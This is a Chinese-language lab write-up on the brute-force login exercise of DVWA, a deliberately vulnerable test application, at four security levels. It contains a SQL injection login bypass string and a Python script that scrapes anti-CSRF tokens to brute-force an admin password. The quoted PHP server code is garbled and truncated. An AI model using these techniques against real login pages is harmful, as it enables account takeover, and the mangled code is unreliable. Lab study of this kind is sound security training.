Brute Force
low服务端代码:
'.mysql_error().'Welcometothepasswordprotectedarea{$user}
"; echo""; } mysql_close(); } ?>
Usernameand/orpasswordincorrect.
暴力破解思路:
账号admin,
1、简单字典多次暴力破解
2、sql注入(例如:admin' or '1'='1)
medium服务端代码:
'.mysql_error().'Welcometothepasswordprotectedarea{$user}
"; echo""; } mysql_close(); } ?>
Usernameand/orpasswordincorrect.
破解思路:
medium的代码主要增加了mysql_real_escape_string函数,这个函数会对字符串中的特殊符号(x00,n,r,,’,”,x1a)进行转义,基本上能够抵御sql注入攻击。并且密码用了md5,也无法注入,sleep(2)也无法有效阻止暴力破解。
账号同为admin
简单字典多次暴力破解
high服务端代码:
'.mysql_error().'Welcometothepasswordprotectedarea{$user}
"; echo""; } mysql_close(); } //GenerateAnti-CSRFtoken generateSessionToken(); ?>
Usernameand/orpasswordincorrect.
high加入了token,可以抵御csrf攻击,使用了stripslashes(去除字符串中的反斜线字符,如果有两个连续的反斜线,则只去掉一个)
利用思路:
由于加入token不能无脑爆破了。。,写个脚本吧。
所以想起python有个BeautifulSoup的插件可以获得token然后爆破。所以网上参考下,写个python脚本
from bs4 import BeautifulSoup
import urllib2
header = {
'Host':'139.199.12.253',
'Cache-Control':'max-age=0',
'IF-None-Match':"307-52156c6a290c0",
'IF-Modified-Since':'Tue, 15 Agu 2017 07:25:23 GMT',
'User-Agent':'Mozilla/5.0(Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36',
'Accept': '*/*',
'Referer': 'http://139.199.12.253/dvwa/vulnerabilities/brute/index.php',
'Accept-Encoding': 'gzip, deflate, sdch',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Cookie': 'security=high; PHPSESSID=ghdpaoprianls3rd7cupdfkpk5'
}
requrl = "http://139.199.12.254/dvwa/vulnerabilities/brute/"
def get_token(requrl,header):
req = urllib2.Request(url=requrl,headers=header)
response = urllib2.urlopen(req)
print response.getcode(),
the_page = response.read()
print len(the_page)
soup = BeautifulSoup(the_page,"html.parser")
user_token = soup.form.input.input.input.input["value"]
print user_token
return user_token
user_token = get_token(requrl,header)
i=0
for line in open("brute.txt"):
requrl = "http://139.199.12.254/dvwa/vulnerabilities/brute/"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
i=i+1;
print i,'admin',line.strip(),
user_token = get_token(requrl,header)
if (i==10):
break
pass
然后可利用字典了。。
impossible服务端代码:
prepare('SELECTfailed_login,last_loginFROMusersWHEREuser=(:user)LIMIT1;');
$data->bindParam(':user',$user,PDO::PARAM_STR);
$data->execute();
$row=$data->fetch();
//Checktoseeiftheuserhasbeenlockedout.
if(($data->rowCount()==1)&&($row['failed_login']>=$total_failed_login)){
//Userlockedout.Note,usingthismethodwouldallowforuserenumeration!
//echo"
Thisaccounthasbeenlockedduetotoomanyincorrectlogins.
";
//Calculatewhentheuserwouldbeallowedtologinagain
$last_login=$row['last_login'];
$last_login=strtotime($last_login);
$timeout=strtotime("{$last_login}+{$lockout_time}minutes");
$timenow=strtotime("now");
//Checktoseeifenoughtimehaspassed,ifithasn'tlockedtheaccount
if($timenow>$timeout)
$account_locked=true;
}
//Checkthedatabase(ifusernamematchesthepassword)
$data=$db->prepare('SELECT*FROMusersWHEREuser=(:user)ANDpassword=(:password)LIMIT1;');
$data->bindParam(':user',$user,PDO::PARAM_STR);
$data->bindParam(':password',$pass,PDO::PARAM_STR);
$data->execute();
$row=$data->fetch();
//Ifitsavalidlogin...
if(($data->rowCount()==1)&&($account_locked==false)){
//Getusersdetails
$avatar=$row['avatar'];
$failed_login=$row['failed_login'];
$last_login=$row['last_login'];
//Loginsuccessful
echo"Welcometothepasswordprotectedarea{$user}
";
echo"Warning:Someonemightofbeenbruteforcingyouraccount.
";
echo"Numberofloginattempts:{$failed_login}.
Lastloginattemptwasat:${last_login}.
";
}
//Resetbadlogincount
$data=$db->prepare('UPDATEusersSETfailed_login="0"WHEREuser=(:user)LIMIT1;');
$data->bindParam(':user',$user,PDO::PARAM_STR);
$data->execute();
}
else{
//Loginfailed
sleep(rand(2,4));
//Givetheusersomefeedback
echo"
Usernameand/orpasswordincorrect.
Alternative,theaccounthasbeenlockedbecauseoftoomanyfailedlogins.
Ifthisisthecase,pleasetryagainin{$lockout_time}minutes.
";
//Updatebadlogincount
$data=$db->prepare('UPDATEusersSETfailed_login=(failed_login+1)WHEREuser=(:user)LIMIT1;');
$data->bindParam(':user',$user,PDO::PARAM_STR);
$data->execute();
}
//Setthelastlogintime
$data=$db->prepare('UPDATEusersSETlast_login=now()WHEREuser=(:user)LIMIT1;');
$data->bindParam(':user',$user,PDO::PARAM_STR);
$data->execute();
}
//GenerateAnti-CSRFtoken
generateSessionToken();
?>
impossible 明显加入防爆破,登录次数验证,也用了PDO,有效防止注入,目前臣妾做不到。